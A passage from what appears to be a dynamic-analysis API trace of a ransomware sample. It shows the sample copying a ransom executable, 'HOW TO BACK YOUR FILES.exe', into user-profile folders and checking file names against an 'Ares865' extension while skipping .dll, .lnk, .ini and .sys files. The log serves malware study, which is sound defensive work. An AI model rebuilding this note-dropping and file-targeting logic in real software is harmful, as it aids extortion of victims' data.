ftLastWriteTime.dwLowDateTime=0x49e30880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.752] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.752] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.752] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0040.752] lstrlenW (lpString="Desktop.ini") returned 11 [0040.753] lstrlenW (lpString="Ares865") returned 7 [0040.753] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.753] lstrlenW (lpString=".dll") returned 4 [0040.753] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0040.753] lstrlenW (lpString=".lnk") returned 4 [0040.753] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0040.753] lstrlenW (lpString=".ini") returned 4 [0040.753] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0040.753] lstrlenW (lpString=".sys") returned 4 [0040.753] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0040.753] lstrlenW (lpString="Desktop.ini") returned 11 [0040.753] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="Ease of Access.lnk" | out: lpString1="Ease of Access.lnk") returned="Ease of Access.lnk" [0040.753] lstrlenW (lpString="Ease of Access.lnk") returned 18 [0040.753] lstrlenW (lpString="Ares865") returned 7 [0040.753] lstrcmpiW (lpString1="ess.lnk", lpString2="Ares865") returned 1 [0040.753] lstrlenW (lpString=".dll") returned 4 [0040.753] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".dll") returned 1 [0040.753] lstrlenW (lpString=".lnk") returned 4 [0040.753] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".lnk") returned 1 [0040.753] lstrlenW (lpString=".ini") returned 4 [0040.753] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".ini") returned 1 [0040.753] lstrlenW (lpString=".sys") returned 4 [0040.753] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".sys") returned 1 [0040.753] lstrlenW (lpString="Ease of Access.lnk") returned 18 [0040.753] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="Magnify.lnk" | out: lpString1="Magnify.lnk") returned="Magnify.lnk" [0040.753] lstrlenW (lpString="Magnify.lnk") returned 11 [0040.753] lstrlenW (lpString="Ares865") returned 7 [0040.753] lstrcmpiW (lpString1="ify.lnk", lpString2="Ares865") returned 1 [0040.753] lstrlenW (lpString=".dll") returned 4 [0040.753] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".dll") returned 1 [0040.753] lstrlenW (lpString=".lnk") returned 4 [0040.753] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".lnk") returned 1 [0040.754] lstrlenW (lpString=".ini") returned 4 [0040.754] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".ini") returned 1 [0040.754] lstrlenW (lpString=".sys") returned 4 [0040.754] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".sys") returned 1 [0040.754] lstrlenW (lpString="Magnify.lnk") returned 11 [0040.754] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="Narrator.lnk" | out: lpString1="Narrator.lnk") returned="Narrator.lnk" [0040.754] lstrlenW (lpString="Narrator.lnk") returned 12 [0040.754] lstrlenW (lpString="Ares865") returned 7 [0040.754] lstrcmpiW (lpString1="tor.lnk", lpString2="Ares865") returned 1 [0040.754] lstrlenW (lpString=".dll") returned 4 [0040.754] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".dll") returned 1 [0040.754] lstrlenW (lpString=".lnk") returned 4 [0040.754] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".lnk") returned 1 [0040.754] lstrlenW (lpString=".ini") returned 4 [0040.754] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".ini") returned 1 [0040.754] lstrlenW (lpString=".sys") returned 4 [0040.754] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".sys") returned 1 [0040.754] lstrlenW (lpString="Narrator.lnk") returned 12 [0040.754] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="On-Screen Keyboard.lnk" | out: lpString1="On-Screen Keyboard.lnk") returned="On-Screen Keyboard.lnk" [0040.754] lstrlenW (lpString="On-Screen Keyboard.lnk") returned 22 [0040.754] lstrlenW (lpString="Ares865") returned 7 [0040.754] lstrcmpiW (lpString1="ard.lnk", lpString2="Ares865") returned -1 [0040.754] lstrlenW (lpString=".dll") returned 4 [0040.754] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".dll") returned 1 [0040.754] lstrlenW (lpString=".lnk") returned 4 [0040.754] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".lnk") returned 1 [0040.754] lstrlenW (lpString=".ini") returned 4 [0040.754] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".ini") returned 1 [0040.754] lstrlenW (lpString=".sys") returned 4 [0040.754] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".sys") returned 1 [0040.754] lstrlenW (lpString="On-Screen Keyboard.lnk") returned 22 [0040.755] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\SendTo", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\SendTo") returned="C:\\Users\\Default User\\SendTo" [0040.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e65a0 | out: hHeap=0x2b0000) returned 1 [0040.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0040.755] lstrlenW (lpString="C:\\Users\\Default User\\SendTo") returned 28 [0040.755] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\SendTo" | out: lpString1="C:\\Users\\Default User\\SendTo") returned="C:\\Users\\Default User\\SendTo" [0040.755] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.755] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\SendTo\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\sendto\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.763] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.763] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\SendTo\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e569e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e569e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.764] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.764] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.764] lstrcpyW (in: lpString1=0x2e2e89a, lpString2="Compressed (zipped) Folder.ZFSendToTarget" | out: lpString1="Compressed (zipped) Folder.ZFSendToTarget") returned="Compressed (zipped) Folder.ZFSendToTarget" [0040.764] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget") returned 41 [0040.764] lstrlenW (lpString="Ares865") returned 7 [0040.764] lstrcmpiW (lpString1="oTarget", lpString2="Ares865") returned 1 [0040.764] lstrlenW (lpString=".dll") returned 4 [0040.764] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".dll") returned 1 [0040.764] lstrlenW (lpString=".lnk") returned 4 [0040.764] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".lnk") returned 1 [0040.764] lstrlenW (lpString=".ini") returned 4 [0040.764] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".ini") returned 1 [0040.764] lstrlenW (lpString=".sys") returned 4 [0040.764] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".sys") returned 1 [0040.764] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget") returned 41 [0040.764] lstrcpyW (in: lpString1=0x2e2e89a, lpString2="Desktop (create shortcut).DeskLink" | out: lpString1="Desktop (create shortcut).DeskLink") returned="Desktop (create shortcut).DeskLink" [0040.764] lstrlenW (lpString="Desktop (create shortcut).DeskLink") returned 34 [0040.764] lstrlenW (lpString="Ares865") returned 7 [0040.764] lstrcmpiW (lpString1="eskLink", lpString2="Ares865") returned 1 [0040.764] lstrlenW (lpString=".dll") returned 4 [0040.764] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".dll") returned 1 [0040.764] lstrlenW (lpString=".lnk") returned 4 [0040.764] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".lnk") returned 1 [0040.764] lstrlenW (lpString=".ini") returned 4 [0040.765] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".ini") returned 1 [0040.765] lstrlenW (lpString=".sys") returned 4 [0040.765] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".sys") returned 1 [0040.765] lstrlenW (lpString="Desktop (create shortcut).DeskLink") returned 34 [0040.765] lstrcpyW (in: lpString1=0x2e2e89a, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0040.765] lstrlenW (lpString="Desktop.ini") returned 11 [0040.765] lstrlenW (lpString="Ares865") returned 7 [0040.765] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.765] lstrlenW (lpString=".dll") returned 4 [0040.765] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0040.765] lstrlenW (lpString=".lnk") returned 4 [0040.765] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0040.765] lstrlenW (lpString=".ini") returned 4 [0040.765] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0040.765] lstrlenW (lpString=".sys") returned 4 [0040.765] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0040.765] lstrlenW (lpString="Desktop.ini") returned 11 [0040.765] lstrcpyW (in: lpString1=0x2e2e89a, lpString2="Documents.mydocs" | out: lpString1="Documents.mydocs") returned="Documents.mydocs" [0040.765] lstrlenW (lpString="Documents.mydocs") returned 16 [0040.765] lstrlenW (lpString="Ares865") returned 7 [0040.765] lstrcmpiW (lpString1=".mydocs", lpString2="Ares865") returned -1 [0040.765] lstrlenW (lpString=".dll") returned 4 [0040.765] lstrcmpiW (lpString1="Documents.mydocs", lpString2=".dll") returned 1 [0040.765] lstrlenW (lpString=".lnk") returned 4 [0040.765] lstrcmpiW (lpString1="Documents.mydocs", lpString2=".lnk") returned 1 [0040.765] lstrlenW (lpString=".ini") returned 4 [0040.765] lstrcmpiW (lpString1="Documents.mydocs", lpString2=".ini") returned 1 [0040.765] lstrlenW (lpString=".sys") returned 4 [0040.765] lstrcmpiW (lpString1="Documents.mydocs", lpString2=".sys") returned 1 [0040.765] lstrlenW (lpString="Documents.mydocs") returned 16 [0040.765] lstrcpyW (in: lpString1=0x2e2e89a, lpString2="Fax Recipient.lnk" | out: lpString1="Fax Recipient.lnk") returned="Fax Recipient.lnk" [0040.766] lstrlenW (lpString="Fax Recipient.lnk") returned 17 [0040.766] lstrlenW (lpString="Ares865") returned 7 [0040.766] lstrcmpiW (lpString1="ent.lnk", lpString2="Ares865") returned 1 [0040.766] lstrlenW (lpString=".dll") returned 4 [0040.766] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".dll") returned 1 [0040.766] lstrlenW (lpString=".lnk") returned 4 [0040.766] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".lnk") returned 1 [0040.766] lstrlenW (lpString=".ini") returned 4 [0040.766] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".ini") returned 1 [0040.766] lstrlenW (lpString=".sys") returned 4 [0040.766] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".sys") returned 1 [0040.766] lstrlenW (lpString="Fax Recipient.lnk") returned 17 [0040.766] lstrcpyW (in: lpString1=0x2e2e89a, lpString2="Mail Recipient.MAPIMail" | out: lpString1="Mail Recipient.MAPIMail") returned="Mail Recipient.MAPIMail" [0040.766] lstrlenW (lpString="Mail Recipient.MAPIMail") returned 23 [0040.766] lstrlenW (lpString="Ares865") returned 7 [0040.766] lstrcmpiW (lpString1="APIMail", lpString2="Ares865") returned -1 [0040.766] lstrlenW (lpString=".dll") returned 4 [0040.766] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2=".dll") returned 1 [0040.766] lstrlenW (lpString=".lnk") returned 4 [0040.766] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2=".lnk") returned 1 [0040.766] lstrlenW (lpString=".ini") returned 4 [0040.766] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2=".ini") returned 1 [0040.766] lstrlenW (lpString=".sys") returned 4 [0040.766] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2=".sys") returned 1 [0040.766] lstrlenW (lpString="Mail Recipient.MAPIMail") returned 23 [0040.766] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Searches", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Searches") returned="C:\\Users\\Default User\\Searches" [0040.766] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6558 | out: hHeap=0x2b0000) returned 1 [0040.766] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0040.766] lstrlenW (lpString="C:\\Users\\Default User\\Searches") returned 30 [0040.766] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Searches" | out: lpString1="C:\\Users\\Default User\\Searches") returned="C:\\Users\\Default User\\Searches" [0040.766] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.767] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Searches\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\searches\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.774] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.774] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Searches\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49e569e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e569e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.774] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.774] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.774] lstrcpyW (in: lpString1=0x2e2e89e, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.774] lstrlenW (lpString="desktop.ini") returned 11 [0040.774] lstrlenW (lpString="Ares865") returned 7 [0040.774] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.774] lstrlenW (lpString=".dll") returned 4 [0040.774] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.774] lstrlenW (lpString=".lnk") returned 4 [0040.774] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.774] lstrlenW (lpString=".ini") returned 4 [0040.774] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.774] lstrlenW (lpString=".sys") returned 4 [0040.774] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.774] lstrlenW (lpString="desktop.ini") returned 11 [0040.774] lstrcpyW (in: lpString1=0x2e2e89e, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0040.774] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Searches\\Everywhere.search-ms", dwFileAttributes=0x22) returned 1 [0040.777] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0040.777] lstrlenW (lpString="Ares865") returned 7 [0040.777] lstrcmpiW (lpString1="arch-ms", lpString2="Ares865") returned -1 [0040.777] lstrlenW (lpString=".dll") returned 4 [0040.777] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".dll") returned 1 [0040.777] lstrlenW (lpString=".lnk") returned 4 [0040.777] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".lnk") returned 1 [0040.777] lstrlenW (lpString=".ini") returned 4 [0040.777] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".ini") returned 1 [0040.777] lstrlenW (lpString=".sys") returned 4 [0040.778] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".sys") returned 1 [0040.778] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0040.778] lstrcpyW (in: lpString1=0x2e2e89e, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0040.778] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x22) returned 1 [0040.778] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0040.778] lstrlenW (lpString="Ares865") returned 7 [0040.778] lstrcmpiW (lpString1="arch-ms", lpString2="Ares865") returned -1 [0040.778] lstrlenW (lpString=".dll") returned 4 [0040.778] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".dll") returned 1 [0040.778] lstrlenW (lpString=".lnk") returned 4 [0040.778] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".lnk") returned 1 [0040.778] lstrlenW (lpString=".ini") returned 4 [0040.778] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".ini") returned 1 [0040.778] lstrlenW (lpString=".sys") returned 4 [0040.778] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".sys") returned 1 [0040.778] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0040.778] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Saved Games", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Saved Games") returned="C:\\Users\\Default User\\Saved Games" [0040.778] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee970 | out: hHeap=0x2b0000) returned 1 [0040.778] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0040.778] lstrlenW (lpString="C:\\Users\\Default User\\Saved Games") returned 33 [0040.779] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Saved Games" | out: lpString1="C:\\Users\\Default User\\Saved Games") returned="C:\\Users\\Default User\\Saved Games" [0040.779] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.779] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Saved Games\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\saved games\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.783] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.783] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Saved Games\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e7cb40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e7cb40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.783] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.783] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.783] lstrcpyW (in: lpString1=0x2e2e8a4, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.783] lstrlenW (lpString="desktop.ini") returned 11 [0040.783] lstrlenW (lpString="Ares865") returned 7 [0040.783] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.783] lstrlenW (lpString=".dll") returned 4 [0040.783] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.783] lstrlenW (lpString=".lnk") returned 4 [0040.783] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.783] lstrlenW (lpString=".ini") returned 4 [0040.783] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.783] lstrlenW (lpString=".sys") returned 4 [0040.783] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.783] lstrlenW (lpString="desktop.ini") returned 11 [0040.783] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Recent", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Recent") returned="C:\\Users\\Default User\\Recent" [0040.784] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6510 | out: hHeap=0x2b0000) returned 1 [0040.784] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0040.784] lstrlenW (lpString="C:\\Users\\Default User\\Recent") returned 28 [0040.784] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Recent" | out: lpString1="C:\\Users\\Default User\\Recent") returned="C:\\Users\\Default User\\Recent" [0040.784] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.784] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Recent\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\recent\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.794] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.794] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Recent\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e7cb40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e7cb40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.795] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.795] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.795] lstrcpyW (in: lpString1=0x2e2e89a, lpString2="AutomaticDestinations" | out: lpString1="AutomaticDestinations") returned="AutomaticDestinations" [0040.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0040.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x66) returned 0x2cb310 [0040.795] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0040.795] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x15c7376, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CustomDestinations", cAlternateFileName="CUSTOM~1")) returned 1 [0040.795] lstrcmpiW (lpString1="CustomDestinations", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.795] lstrcmpiW (lpString1="CustomDestinations", lpString2="aoldtz.exe") returned 1 [0040.795] lstrcpyW (in: lpString1=0x2e2e89a, lpString2="CustomDestinations" | out: lpString1="CustomDestinations") returned="CustomDestinations" [0040.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0040.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f1fc8 [0040.795] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0040.795] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.795] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.795] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.795] lstrcpyW (in: lpString1=0x2e2e89a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.795] lstrlenW (lpString="desktop.ini") returned 11 [0040.795] lstrlenW (lpString="Ares865") returned 7 [0040.795] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.795] lstrlenW (lpString=".dll") returned 4 [0040.795] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.795] lstrlenW (lpString=".lnk") returned 4 [0040.795] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.796] lstrlenW (lpString=".ini") returned 4 [0040.796] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.796] lstrlenW (lpString=".sys") returned 4 [0040.796] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.796] lstrlenW (lpString="desktop.ini") returned 11 [0040.796] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Recent\\CustomDestinations", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Recent\\CustomDestinations") returned="C:\\Users\\Default User\\Recent\\CustomDestinations" [0040.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0040.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0040.796] lstrlenW (lpString="C:\\Users\\Default User\\Recent\\CustomDestinations") returned 47 [0040.796] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Recent\\CustomDestinations" | out: lpString1="C:\\Users\\Default User\\Recent\\CustomDestinations") returned="C:\\Users\\Default User\\Recent\\CustomDestinations" [0040.796] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.796] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\recent\\customdestinations\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.804] lstrcatW (in: 